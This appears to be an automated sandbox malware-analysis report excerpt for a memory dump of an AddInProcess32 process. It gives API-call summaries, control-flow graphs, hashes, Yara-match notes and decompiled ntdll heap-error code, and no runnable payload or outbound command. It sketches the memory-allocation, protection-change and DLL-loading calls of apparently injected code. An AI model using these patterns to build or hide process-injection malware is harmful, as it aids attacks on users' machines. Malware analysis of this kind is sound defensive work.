                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: &}=s
                              • API String ID: 2706961497-1540406469
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 27 41e091-41e0d4 call 41eb27 NtAllocateVirtualMemory
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: HD@
                              • API String ID: 2167126740-1661062907
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 30 41e097-41e0ad 31 41e0b3-41e0d4 NtAllocateVirtualMemory 30->31 32 41e0ae call 41eb27 30->32 32->31
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: HD@
                              • API String ID: 2167126740-1661062907
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 256 4014e9 257 4014f0-4014ff 256->257 258 401501-401504 257->258 259 401512-401519 257->259 258->259 260 401506-40150a 258->260 259->257 261 40151b 259->261 260->259 262 40150c-401510 260->262 263 40151e-401579 NtProtectVirtualMemory call 4016b0 call 422e97 261->263 262->259 264 401586-40158c 262->264 267 40157b-401585 263->267 264->263
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 284 41deb1-41df08 call 41eb27 NtCreateFile
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 287 41deb7-41decd 288 41ded3-41df08 NtCreateFile 287->288 289 41dece call 41eb27 287->289 289->288
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                              • Instruction ID: c0286b2864f0c35431545fb634747f2496e329dba7df57a784a8bffd1e9d319f
                              • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                              • Instruction Fuzzy Hash: B7F0CFB2204208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 290 41df67-41dfb0 call 41eb27 NtReadFile
                              APIs
                              • NtReadFile.NTDLL(00418997,00413C6F,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C6F,00418997,00000206,00000000), ref: 0041DFAC
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                              • Instruction ID: 32b046dcbb71cb4e6359c6725ba47d80c1c5cab5c032eea9b29b0e9906148c6b
                              • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                              • Instruction Fuzzy Hash: BCF0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630F811CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 8be85a51aaa1456298486231eed1cef669b64ade4e325e3a5c274837d85112d3
                              • Instruction ID: 9333738f6315197c52897b9acbfa4fc777e2fca57136ed0eea7d885d64d4b451
                              • Opcode Fuzzy Hash: 8be85a51aaa1456298486231eed1cef669b64ade4e325e3a5c274837d85112d3
                              • Instruction Fuzzy Hash: ACE086316042146BD724EFA49C49ECB3B58DF45260F014259BD5D5B282C670E500C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                              • Instruction ID: 51f7b19349b25f870e13c14fb46d1f84fc665ab1cf3978e02f270bc9d52711b0
                              • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                              • Instruction Fuzzy Hash: 97D01776204214ABD614EFA9DC89ED77BACDF48664F014155BA0D5B242C630FA00CBE4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2b84c4ee8964a40039a5e96a9ff9037e251541c346b2514dc50fe3f8596a9ad6
                              • Instruction ID: be05b566e99184db9e5cc75eaac03969a03815253e147b1eef2664b7c9bc766f
                              • Opcode Fuzzy Hash: 2b84c4ee8964a40039a5e96a9ff9037e251541c346b2514dc50fe3f8596a9ad6
                              • Instruction Fuzzy Hash: 759002A134100453E10061994414B060005E7E1341FD1C115E205C6A4DDA59CD567166
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 241 408d77-408dc1 call 41fb07 call 4205f7 call 40c307 call 418a77 250 408dc3-408dd5 PostThreadMessageW 241->250 251 408df5-408df9 241->251 252 408df4 250->252 253 408dd7-408df1 call 40ba67 250->253 252->251 253->252
                              APIs
                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DD1
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID:
                              • API String ID: 1836367815-0
                              • Opcode ID: 95c0cf5819db1854bc5c0dc0079e54f48cb26ca33ae3f1a29f068a4d56065828
                              • Instruction ID: 97f6e7e971e73197f155d365dba0286c580c115ece0ca8fbe3fead2fc42a28db
                              • Opcode Fuzzy Hash: 95c0cf5819db1854bc5c0dc0079e54f48cb26ca33ae3f1a29f068a4d56065828
                              • Instruction Fuzzy Hash: DB018831A8022877E720A6959C43FFE766C9F01B55F14412EFF04BA1C1EAA8690586E9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 269 40c307-40c330 call 420847 272 40c332-40c335 269->272 273 40c336-40c344 call 420c67 269->273 276 40c354-40c365 call 41f0c7 273->276 277 40c346-40c351 call 420ee7 273->277 282 40c367-40c37b LdrLoadDll 276->282 283 40c37e-40c381 276->283 277->276 282->283
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C379
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 89e2dd786e92ee88a1331b963abd4538c92f1c0a14e6e32c28af7146fae9f6b9
                              • Instruction ID: aa26c3208db21fe9d8923b5e80f95f0723e0f9138b5b7b95b39cff3b6d63b904
                              • Opcode Fuzzy Hash: 89e2dd786e92ee88a1331b963abd4538c92f1c0a14e6e32c28af7146fae9f6b9
                              • Instruction Fuzzy Hash: 230112B5E4010DEBDB10DBE5DC82F9EB7B89F54304F0082A5AD08A7281F635EB588795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 293 41e319-41e341 call 41eb27 295 41e346-41e35b LookupPrivilegeValueW 293->295
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E357
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: 41ad720353dcb2742b5d85865cd54be19fdf99255da96ff7e466d990369bbe56
                              • Instruction ID: f0d36b154beff089945ff36c40b7f6c6b12bf8043563d0b61c72c28c0769dced
                              • Opcode Fuzzy Hash: 41ad720353dcb2742b5d85865cd54be19fdf99255da96ff7e466d990369bbe56
                              • Instruction Fuzzy Hash: 66F0A071200210AFDB20DF15CC45EE77768EF85310F01856AFD089B241C631A801CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 296 41e1c3-41e1de call 41eb27 298 41e1e3-41e1f8 RtlFreeHeap 296->298
                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: d29290ae4f9fce0d10f3c5a44607d4ffcfd3958d931ef90672fa9196cc4fc4e1
                              • Instruction ID: 224e322902f371e62c276b0b9204af5c1033e43e491b3695333fa65565b85d12
                              • Opcode Fuzzy Hash: d29290ae4f9fce0d10f3c5a44607d4ffcfd3958d931ef90672fa9196cc4fc4e1
                              • Instruction Fuzzy Hash: EDE09AB12002006BD714DF49DC48ED737A9AF88354F108259F90C97282C630F804CAB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1F4
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                              • Instruction ID: ff71e45145ce3c742298049d26a32dfca4dc9eab044cbc71735d9f34edea979b
                              • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                              • Instruction Fuzzy Hash: 95E046B5200218ABDB14EF8ADC49EE737ACEF88754F018159FE095B242CA30F914CBB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 304 41e187-41e1b8 call 41eb27 RtlAllocateHeap
                              APIs
                              • RtlAllocateHeap.NTDLL(0041812D,?,004188D4,004188D4,?,0041812D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E1B4
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                              • Instruction ID: 1388dd934f0a4cc284384f94e8c5a8998a3c4ae718bb400ef2b18055324356cd
                              • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                              • Instruction Fuzzy Hash: 95E046B5200218ABDB18EF9ADC45EE737ACEF88754F018159FE095B242C630F910CBB4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E357
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                              • Instruction ID: c45f07e038ebfe2a057fbf399f056a184573bb7e02c84091132a971eb32c72bf
                              • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                              • Instruction Fuzzy Hash: DBE01AB52002186BD710DF49DC45EE737ADAF88654F118159BE0957242C630F810CAB5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 299 40f527-40f540 300 40f546-40f54b 299->300 301 40f541 call 418a77 299->301 302 40f54d-40f54e 300->302 303 40f54f-40f560 GetUserGeoID 300->303 301->300
                              APIs
                              • GetUserGeoID.KERNELBASE(00000010), ref: 0040F551
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: User
                              • String ID:
                              • API String ID: 765557111-0
                              • Opcode ID: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
                              • Instruction ID: 3a1d2ef0c60c757c0f72a0a3003fad6eb55e58fc730c6d937a84e79b7af20ed7
                              • Opcode Fuzzy Hash: 40bf48d4fd6e03cba57d132749fc158fbbb21c364b99c8ef44d233898b217c90
                              • Instruction Fuzzy Hash: 1FE0C23338030427F62095A98C42FB6328E5B84B04F048475F908E72C1D5A9E5805014
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ExitProcess.KERNEL32(?,00000000,0000007F,?,?,00000001), ref: 0041E22F
                              Memory Dump Source
                              • Source File: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_401000_AddInProcess32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                              • Instruction ID: 13d1b6daedaff665116823a2b2046991a6a8e25442adef1dbb486679b8e7ea51
                              • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                              • Instruction Fuzzy Hash: 5CD0C2312002187BC620DF89CC45FD3379CDF44794F004065BA0C5B242C530BA00C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 68e37210a248f7e47eb25779bd2a856c05e54f147b8173ac2bf0c5b2f056e3df
                              • Instruction ID: e48739a22af62c0aaf6cd864691d8f6d037cb7ba095cc594a1dfd425c1d19496
                              • Opcode Fuzzy Hash: 68e37210a248f7e47eb25779bd2a856c05e54f147b8173ac2bf0c5b2f056e3df
                              • Instruction Fuzzy Hash: A8B02B71C010C0C6EB02D3A40608717390077C0300F57C011D2028380B4738C180F1F1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              • *** enter .exr %p for the exception record, xrefs: 0190B4F1
                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0190B2F3
                              • write to, xrefs: 0190B4A6
                              • a NULL pointer, xrefs: 0190B4E0
                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0190B47D
                              • The resource is owned shared by %d threads, xrefs: 0190B37E
                              • *** Inpage error in %ws:%s, xrefs: 0190B418
                              • *** then kb to get the faulting stack, xrefs: 0190B51C
                              • The instruction at %p tried to %s , xrefs: 0190B4B6
                              • The resource is owned exclusively by thread %p, xrefs: 0190B374
                              • *** enter .cxr %p for the context, xrefs: 0190B50D
                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0190B2DC
                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0190B39B
                              • Go determine why that thread has not released the critical section., xrefs: 0190B3C5
                              • *** An Access Violation occurred in %ws:%s, xrefs: 0190B48F
                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0190B352
                              • The critical section is owned by thread %p., xrefs: 0190B3B9
                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0190B38F
                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0190B484
                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0190B314
                              • This failed because of error %Ix., xrefs: 0190B446
                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0190B323
                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0190B305
                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0190B476
                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0190B53F
                              • The instruction at %p referenced memory at %p., xrefs: 0190B432
                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0190B3D6
                              • <unknown>, xrefs: 0190B27E, 0190B2D1, 0190B350, 0190B399, 0190B417, 0190B48E
                              • an invalid address, %p, xrefs: 0190B4CF
                              • read from, xrefs: 0190B4AD, 0190B4B2
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                              • API String ID: 0-108210295
                              • Opcode ID: 165f4816d0c61b0714a3cfe01cd674581e0761b471b02fbfc354eda5b011e948
                              • Instruction ID: 6b31eb8dfdf6aa66a25d02b234260b83c8a6cb25fa1125f21846fa1f25cebcde
                              • Opcode Fuzzy Hash: 165f4816d0c61b0714a3cfe01cd674581e0761b471b02fbfc354eda5b011e948
                              • Instruction Fuzzy Hash: 3481387DA80200FFDB225B4E8C89D6B3BA9EF67B56F410048F5099B292D6698711C772
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E01911C06() {
                              				signed int _t27;
                              				char* _t104;
                              				char* _t105;
                              				intOrPtr _t113;
                              				intOrPtr _t115;
                              				intOrPtr _t117;
                              				intOrPtr _t119;
                              				intOrPtr _t120;
                              
                              				_t105 = 0x18348a4;
                              				_t104 = "HEAP: ";
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E0185B150();
                              				} else {
                              					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				_push( *0x194589c);
                              				E0185B150("Heap error detected at %p (heap handle %p)\n",  *0x19458a0);
                              				_t27 =  *0x1945898; // 0x0
                              				if(_t27 <= 0xf) {
                              					switch( *((intOrPtr*)(_t27 * 4 +  &M01911E96))) {
                              						case 0:
                              							_t105 = "heap_failure_internal";
                              							goto L21;
                              						case 1:
                              							goto L21;
                              						case 2:
                              							goto L21;
                              						case 3:
                              							goto L21;
                              						case 4:
                              							goto L21;
                              						case 5:
                              							goto L21;
                              						case 6:
                              							goto L21;
                              						case 7:
                              							goto L21;
                              						case 8:
                              							goto L21;
                              						case 9:
                              							goto L21;
                              						case 0xa:
                              							goto L21;
                              						case 0xb:
                              							goto L21;
                              						case 0xc:
                              							goto L21;
                              						case 0xd:
                              							goto L21;
                              						case 0xe:
                              							goto L21;
                              						case 0xf:
                              							goto L21;
                              					}
                              				}
                              				L21:
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E0185B150();
                              				} else {
                              					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				_push(_t105);
                              				E0185B150("Error code: %d - %s\n",  *0x1945898);
                              				_t113 =  *0x19458a4; // 0x0
                              				if(_t113 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E0185B150();
                              					} else {
                              						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E0185B150("Parameter1: %p\n",  *0x19458a4);
                              				}
                              				_t115 =  *0x19458a8; // 0x0
                              				if(_t115 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E0185B150();
                              					} else {
                              						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E0185B150("Parameter2: %p\n",  *0x19458a8);
                              				}
                              				_t117 =  *0x19458ac; // 0x0
                              				if(_t117 != 0) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E0185B150();
                              					} else {
                              						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E0185B150("Parameter3: %p\n",  *0x19458ac);
                              				}
                              				_t119 =  *0x19458b0; // 0x0
                              				if(_t119 != 0) {
                              					L41:
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push(_t104);
                              						E0185B150();
                              					} else {
                              						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					_push( *0x19458b4);
                              					E0185B150("Last known valid blocks: before - %p, after - %p\n",  *0x19458b0);
                              				} else {
                              					_t120 =  *0x19458b4; // 0x0
                              					if(_t120 != 0) {
                              						goto L41;
                              					}
                              				}
                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              					_push(_t104);
                              					E0185B150();
                              				} else {
                              					E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              				}
                              				return E0185B150("Stack trace available at %p\n", 0x19458c0);
                              			}












                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
